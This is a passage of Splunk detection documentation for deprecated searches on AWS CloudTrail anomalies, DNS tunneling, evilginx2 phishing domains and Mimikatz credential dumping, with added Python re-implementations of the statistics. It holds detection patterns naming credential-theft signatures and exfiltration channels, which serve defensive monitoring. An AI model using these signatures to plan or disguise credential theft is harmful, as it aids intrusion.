T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high aws instances terminated by user

This search looks for CloudTrail events where an abnormally high number of instances were successfully terminated by a user in a 10-minute window. This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=TerminateInstances errorCode=success | bucket span=10m _time | stats count AS instances_terminated by _time userName | eventstats avg(instances_terminated) as total_terminations_avg, stdev(instances_terminated) as total_terminations_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_terminated > total_terminations_avg+(total_terminations_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_terminated - total_terminations_avg) / total_terminations_stdev, 2) | table _time, userName, instances_terminated, num_standard_deviations_away, total_terminations_avg, total_terminations_stdev | `abnormally_high_aws_instances_terminated_by_user_filter`
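The launch and terminate searches above use the same statistic: count events per 10-minute bucket and user, take the mean and sample standard deviation over all (bucket, user) rows with `eventstats`, and flag rows in the current bucket above mean + 4 standard deviations. The following is an added example, not Splunk's code; the CloudTrail-like events, user names and the `NOW` timestamp are constructed.

```python
"""Batch outlier logic of the 'Abnormally high AWS instances launched /
terminated by user' searches. Added example, not Splunk's code; events are
constructed CloudTrail-like records with epoch-second `_time` values."""
from collections import Counter
from statistics import mean, stdev

BUCKET = 600                 # bucket span=10m
THRESHOLD_VALUE = 4          # eval threshold_value = 4
NOW = 1_595_332_800          # constructed 'now' (2020-07-21 12:00:00 UTC), minute-aligned

def bucket_counts(events, event_name="RunInstances"):
    """`eventName=RunInstances errorCode=success | bucket span=10m _time
    | stats count AS instances_launched by _time userName`"""
    counts = Counter()
    for ev in events:
        if ev["eventName"] != event_name or ev["errorCode"] != "success":
            continue
        counts[(ev["_time"] - ev["_time"] % BUCKET, ev["userName"])] += 1
    return counts

def find_outliers(counts, now=NOW, threshold_value=THRESHOLD_VALUE):
    """eventstats avg/stdev over all rows, then keep rows in the most recent
    bucket whose count exceeds avg + threshold_value * stdev."""
    values = list(counts.values())
    if not values:
        return []
    avg = mean(values)
    sd = stdev(values) if len(values) > 1 else 0.0   # Splunk stdev() is sample stdev
    alerts = []
    for (bucket_time, user), n in sorted(counts.items()):
        is_outlier = n > avg + sd * threshold_value
        # `search isOutlier=1 AND _time >= relative_time(now(), "-10m@m")`
        if is_outlier and bucket_time >= now - BUCKET:
            alerts.append({
                "_time": bucket_time,
                "userName": user,
                "instances_launched": n,
                # a zero stdev would make the SPL division null; report None here
                "num_standard_deviations_away": round(abs(n - avg) / sd, 2) if sd else None,
                "total_launched_avg": avg,
                "total_launched_stdev": sd,
            })
    return alerts

def constructed_events():
    """24 buckets (4 hours) of a deployment service account launching 2
    instances each, then one user launching 20 in the current bucket, plus a
    failed call that the errorCode=success filter must drop."""
    def run(t, user, code="success"):
        return {"_time": t, "eventName": "RunInstances", "errorCode": code, "userName": user}
    events = []
    for k in range(24):
        t = NOW - 300 - k * BUCKET     # one timestamp in the middle of each bucket
        events += [run(t, "svc-deploy") for _ in range(2)]
    events += [run(NOW - 120, "bob") for _ in range(20)]
    events.append(run(NOW - 60, "bob", "Client.UnauthorizedOperation"))
    return events

def run_example():
    return find_outliers(bucket_counts(constructed_events()))

if __name__ == "__main__":
    for alert in run_example():
        print(alert)
```

With 25 rows the mean is 2.72 and the sample standard deviation 3.6, so the threshold is 17.12: the 20-instance burst is flagged at 4.8 standard deviations while the service account's steady 2 per bucket is not.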

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured with your AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify whether this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high aws instances terminated by user - mltk

This search looks for CloudTrail events where a user successfully terminates an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=TerminateInstances errorCode=success `abnormally_high_aws_instances_terminated_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_terminated by _time src_user | apply ec2_excessive_terminateinstances_v1 | rename "IsOutlier(instances_terminated)" as isOutlier | where isOutlier=1

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. The threshold value should be tuned to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Clients connecting to multiple dns servers

This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1048.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count, values(DNS.dest) AS dest dc(DNS.dest) as dest_count from datamodel=Network_Resolution where DNS.message_type=QUERY by DNS.src | `drop_dm_object_name("Network_Resolution")` | where dest_count > 5 | `clients_connecting_to_multiple_dns_servers_filter`

Associated Analytic Story


How To Implement

This search requires that DNS data is being ingested and populating the `Network_Resolution` data model. This data can come from DNS logs or from solutions that parse network traffic for this data, such as Splunk Stream or Bro.

This search produces a field (`dest_count`) that is not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. This field contributes additional context to the notable. To see the additional metadata, add the following field, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):

  • **Label:** Distinct DNS Connections, **Field:** dest_count

Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration


Kill Chain Phase

  • Command and Control


Known False Positives

It's possible that an enterprise has more than five DNS servers that are configured in a round-robin rotation. Please customize the search, as appropriate.

Reference

Test Dataset

version: 3


Cloud network access control list deleted

Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the Change datamodel to detect users deleting network ACLs. Deprecated because it is a duplicate.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-09-08

Search

`cloudtrail` eventName=DeleteNetworkAcl | rename userIdentity.arn as arn | stats count min(_time) as firstTime max(_time) as lastTime values(errorMessage) values(errorCode) values(userAgent) values(userIdentity.*) by src userName arn eventName | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `cloud_network_access_control_list_deleted_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You can also provide additional filtering for this search by customizing the `cloud_network_access_control_list_deleted_filter` macro.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has legitimately deleted a network ACL.

Reference

Test Dataset

version: 1


Dns query requests resolved by unauthorized dns servers

This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1071.004
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count from datamodel=Network_Resolution where DNS.dest_category != dns_server AND DNS.src_category != dns_server by DNS.src DNS.dest | `drop_dm_object_name("DNS")` | `dns_query_requests_resolved_by_unauthorized_dns_servers_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you will need to ensure that DNS data is populating the Network_Resolution data model. It also requires that your DNS servers are identified correctly in the Assets and Identity table of Enterprise Security.

Required field

ATT&CK

ID Technique Tactic
T1071.004 DNS Command and Control


Kill Chain Phase

  • Command and Control


Known False Positives

Legitimate DNS activity can be detected in this search. Investigate, verify and update the list of authorized DNS servers as appropriate.

Reference

Test Dataset

version: 3


Detect api activity from users without mfa

This search looks for CloudTrail events where a user who logged into the AWS account is making API calls without having multi-factor authentication enabled. Multi-factor authentication adds a layer of security by forcing users to type a unique authentication code from an approved authentication device when they access AWS websites or services. AWS Best Practices recommend that you enable MFA for privileged IAM users.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-05-17

Search

`cloudtrail` userIdentity.sessionContext.attributes.mfaAuthenticated=false | search NOT [ | inputlookup aws_service_accounts | fields identity | rename identity as user] | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by userIdentity.arn userIdentity.type user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_api_activity_from_users_without_mfa_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. Leverage the support search `Create a list of approved AWS service accounts`: run it once every 30 days to create a list of service accounts and validate them.

This search produces fields (`eventName`, `userIdentity.type`, `userIdentity.arn`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):

  • **Label:** AWS Event Name, **Field:** eventName
  • **Label:** AWS User ARN, **Field:** userIdentity.arn
  • **Label:** AWS User Type, **Field:** userIdentity.type

Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

Kill Chain Phase

Known False Positives

Many service accounts configured within an AWS infrastructure do not have multi-factor authentication enabled. If service accounts trigger this search, ignore them and instead add them to the aws_service_accounts.csv file to fine-tune the detection. It is also possible that the search detects users in your environment who authenticate through Single Sign-On systems, since in that case MFA is not handled by AWS.

Reference

Test Dataset

version: 1


Detect aws api activities from unapproved accounts

This search looks for successful CloudTrail activity by user accounts that are not listed in the identity table or `aws_service_accounts.csv`. It returns event names and count, as well as the first and last time a specific user or service is detected, grouped by users. Deprecated because managing this list can be quite hard.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` errorCode=success | rename userName as identity | search NOT [ | inputlookup identity_lookup_expanded | fields identity] | search NOT [ | inputlookup aws_service_accounts | fields identity] | rename identity as user | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_api_activities_from_unapproved_accounts_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You must also populate the `identity_lookup_expanded` lookup shipped with the Asset and Identity framework to be able to look up users in your identity table in Enterprise Security (ES). Leverage the support search called "Create a list of approved AWS service accounts": run it once every 30 days to create and validate a list of service accounts.

This search produces fields (`eventName`, `firstTime`, `lastTime`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):

  • **Label:** AWS Event Name, **Field:** eventName
  • **Label:** First Time, **Field:** firstTime
  • **Label:** Last Time, **Field:** lastTime

Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's likely that you'll find activity detected by users/service accounts that are not listed in the `identity_lookup_expanded` or `aws_service_accounts.csv` file. If the user is a legitimate service account, update the `aws_service_accounts.csv` table with that entry.

Reference

Test Dataset

version: 2


Detect dns requests to phishing sites leveraging evilginx2

This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1566.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(DNS.answer) as answer from datamodel=Network_Resolution.DNS by DNS.dest DNS.src DNS.query host | `drop_dm_object_name(DNS)` | rex field=query ".*?(?<domain>[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$" | stats count values(query) as query by domain dest src answer | search `evilginx_phishlets_amazon` OR `evilginx_phishlets_facebook` OR `evilginx_phishlets_github` OR `evilginx_phishlets_0365` OR `evilginx_phishlets_outlook` OR `evilginx_phishlets_aws` OR `evilginx_phishlets_google` | search NOT [ inputlookup legit_domains.csv | fields domain] | join domain type=outer [ | tstats count `security_content_summariesonly` values(Web.url) as url from datamodel=Web.Web by Web.dest Web.site | rename "Web.*" as * | rex field=site ".*?(?<domain>[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$" | table dest domain url] | table count src dest query answer domain url | `detect_dns_requests_to_phishing_sites_leveraging_evilginx2_filter`

Associated Analytic Story


How To Implement

You need to ingest data from your DNS logs in the Network_Resolution datamodel. Specifically, you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach allows you to also create your own localized passive DNS capability, which can aid you in future investigations. You will have to add legitimate domain names to the `legit_domains.csv` file shipped with the app.

**Splunk>Phantom Playbook Integration**

If Splunk>Phantom is also configured in your environment, a Playbook called `Lets Encrypt Domain Investigate` can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active (Playbook link: `https://my.phantom.us/4.2/playbook/lets-encrypt-domain-investigate/`).


Required field

ATT&CK

ID Technique Tactic
T1566.003 Spearphishing via Service Initial Access


Kill Chain Phase

  • Delivery
  • Command and Control


Known False Positives

If a known good domain is not listed in the legit_domains.csv file, then the search could give you false positives. Please update that lookup file to filter out DNS requests to legitimate domains.

Reference

Test Dataset

version: 2


Detect long dns txt record response

This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, command and control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1048.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Resolution where DNS.message_type=response AND DNS.record_type=TXT by DNS.src DNS.dest DNS.answer DNS.record_type | `drop_dm_object_name("DNS")` | eval anslen=len(answer) | search anslen>100 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename src as "Source IP", dest as "Destination IP", answer as "DNS Answer" anslen as "Answer Length" record_type as "DNS Record Type" firstTime as "First Time" lastTime as "Last Time" count as Count | table "Source IP" "Destination IP" "DNS Answer" "DNS Record Type" "Answer Length" Count "First Time" "Last Time" | `detect_long_dns_txt_record_response_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to ingest data from your DNS logs, or monitor DNS traffic using Stream, Bro or something similar. Specifically, this query requires that the DNS data model is populated with information regarding the DNS record type that is being returned as well as the data in the answer section of the protocol.

Required field

ATT&CK

ID Technique Tactic
T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration


Kill Chain Phase

  • Command and Control


Known False Positives

It's possible that legitimate TXT record responses can be long enough to trigger this search. You can modify the answer-length threshold (`anslen>100`) for this search to help mitigate false positives.

Reference

Test Dataset

version: 2


Detect mimikatz using loaded images

This search looks for loaded images unique to credential dumping with Mimikatz. Deprecated because the Mimikatz libraries changed and Sysmon EventCode 7 is very noisy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-03

Search

`sysmon` EventCode=7 | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as ImageLoaded values(ProcessId) as ProcessId by Computer, Image | search ImageLoaded=*WinSCard.dll ImageLoaded=*cryptdll.dll ImageLoaded=*hid.dll ImageLoaded=*samlib.dll ImageLoaded=*vaultcli.dll | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_using_loaded_images_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 7 with powershell.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Other tools can import the same DLLs. These tools should be part of a whitelist.

Reference


Test Dataset

version: 1


Detect mimikatz via powershell and eventcode 4703

This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated because logging of this activity appears to have changed.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-02-27

Search

`wineventlog_security` signature_id=4703 Process_Name=*powershell.exe | rex field=Message "Enabled Privileges:\s+(?<privs>\w+)\s+Disabled Privileges:" | where privs="SeDebugPrivilege" | stats count min(_time) as firstTime max(_time) as lastTime by dest, Process_Name, privs, Process_ID, Message | rename privs as "Enabled Privilege" | rename Process_Name as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_via_powershell_and_eventcode_4703_filter`

Associated Analytic Story


How To Implement

You must be ingesting Windows Security logs. You must also enable the account change auditing here: http://docs.splunk.com/Documentation/Splunk/7.0.2/Data/MonitorWindowseventlogdata. Additionally, this search requires you to enable your Group Management Audit Logs in your Local Windows Security Policy and to be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/. Finally, please make sure that the local administrator group name is "Administrators" to be able to look for the right group membership changes.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The activity may be legitimate. PowerShell is often used by administrators to perform various tasks, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise.

Reference

Test Dataset

version: 2


Detect spike in aws api activity

This search will detect users creating spikes of API activity in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventType=AwsApiCall [search `cloudtrail` eventType=AwsApiCall | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup api_call_by_user_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup api_call_by_user_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_aws_api_activity_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required before there is a statistically significant amount of data to determine a spike. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike.

This search produces fields (`eventName`, `numberOfApiCalls`, `uniqueApisCalled`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):

  1. **Label:** AWS Event Name, **Field:** eventName
  2. **Label:** Number of API Calls, **Field:** numberOfApiCalls
  3. **Label:** Unique API Calls, **Field:** uniqueApisCalled

Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Reference

Test Dataset

version: 2


Detect spike in network acl activity

This search will detect users creating spikes in API activity related to network access-control lists (ACLs) in your AWS environment. This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2018-05-21

Search

`cloudtrail` `network_acl_events` [search `cloudtrail` `network_acl_events` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup network_acl_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup network_acl_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_network_acl_activity_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required before there is a statistically significant amount of data to determine a spike. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Network ACL Activity by ARN" support search once to create a lookup file of previously seen Network ACL Activity. To add or remove API event names related to network ACLs, edit the macro `network_acl_events`.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The false-positive rate may vary based on the values of `dataPointThreshold` and `deviationThreshold`. Please modify these according to your environment.

Reference

Test Dataset

version: 1


Detect spike in security group activity

This search will detect users creating spikes in API activity related to security groups in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2018-04-18

Search

`cloudtrail` `security_group_api_calls` [search `cloudtrail` `security_group_api_calls` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup security_group_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup security_group_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_security_group_activity_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required before there is a statistically significant amount of data to determine a spike. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Security Group Activity by ARN" support search once to create a history of previously seen Security Group Activity. To add or remove API event names for security groups, edit the macro `security_group_api_calls`.
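The three "Detect spike in ..." searches above (AWS API activity, network ACL activity, security group activity) share one rolling-baseline rule written in SPL. The following is an added Python re-implementation of that rule, not Splunk's code, so its arithmetic and null handling can be checked on constructed data; it assumes the baseline lookup can be modelled as a dict keyed by ARN and treats the SPL constant 720 as the window length of the running average (the page does not say what it represents).

```python
"""Added example: the rolling mean/stdev spike test used by the
"Detect spike in ..." searches, translated from SPL to Python.
Assumptions: baseline lookup == dict keyed by ARN; 720 == window length.
"""
import math
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

WINDOW = 720  # from the SPL "/720" and "*719"; assumed to be the window length


@dataclass
class Baseline:
    avg: Optional[float] = None    # avgApiCalls   (None models an SPL null)
    stdev: Optional[float] = None  # stdevApiCalls
    n: Optional[int] = None        # numDataPoints


def update_baseline(row: Baseline, latest: Optional[int]) -> Baseline:
    """One run of the baseline-maintenance evals for a single ARN.

    Mirrors the SPL eval/coalesce chain, including its null behaviour:
      * latest is None (ARN in the lookup but not seen this run): keep the row.
      * avg/stdev/n are None (ARN seen now but not in the lookup): they stay
        None, which is why the "Baseline of ... by ARN" support search must be
        run once before this detection can ever fire for that ARN.
    """
    if latest is None:
        return Baseline(row.avg, row.stdev, row.n)
    new_avg = None if row.avg is None else row.avg + (latest - row.avg) / WINDOW
    new_stdev = None
    if row.stdev is not None and new_avg is not None:
        # sqrt(((stdev^2*719 + (latest-newAvg)*(latest-avg))/720)); the product
        # is never negative because newAvg lies between avg and latest.
        var = (row.stdev ** 2 * (WINDOW - 1)
               + (latest - new_avg) * (latest - row.avg)) / WINDOW
        new_stdev = math.sqrt(var)
    n = None if row.n is None else row.n + 1  # numDataPoints+1 stays null if null
    return Baseline(new_avg if new_avg is not None else row.avg,
                    new_stdev if new_stdev is not None else row.stdev, n)


def is_spike(row: Baseline, latest: Optional[int],
             deviation_threshold: float = 3.0,
             data_point_threshold: int = 15) -> bool:
    """isSpike=if((latest > avg+k*stdev) AND n > dataPointThreshold, 1, 0).

    Evaluated on the already-updated row, as the SPL does. Any null operand
    makes the SPL comparison null, which if() treats as false.
    """
    if latest is None or row.avg is None or row.stdev is None or row.n is None:
        return False
    return (latest > row.avg + deviation_threshold * row.stdev
            and row.n > data_point_threshold)


def run_detection(baseline: Dict[str, Baseline], counts: Dict[str, int],
                  deviation_threshold: float = 3.0,
                  data_point_threshold: int = 15
                  ) -> Tuple[Dict[str, Baseline], List[str]]:
    """Join this run's per-ARN counts with the lookup, update it, flag spikes.

    Returns the rows that would be written back by outputlookup and the ARNs
    that would be returned to the outer search.
    """
    updated: Dict[str, Baseline] = {}
    spikes: List[str] = []
    for arn in sorted(set(baseline) | set(counts)):
        new_row = update_baseline(baseline.get(arn, Baseline()), counts.get(arn))
        updated[arn] = new_row
        if is_spike(new_row, counts.get(arn), deviation_threshold, data_point_threshold):
            spikes.append(arn)
    return updated, spikes


# Constructed sample data (fictional ARNs using AWS's documentation account id).
ALICE = "arn:aws:iam::123456789012:user/alice"  # long history, quiet baseline
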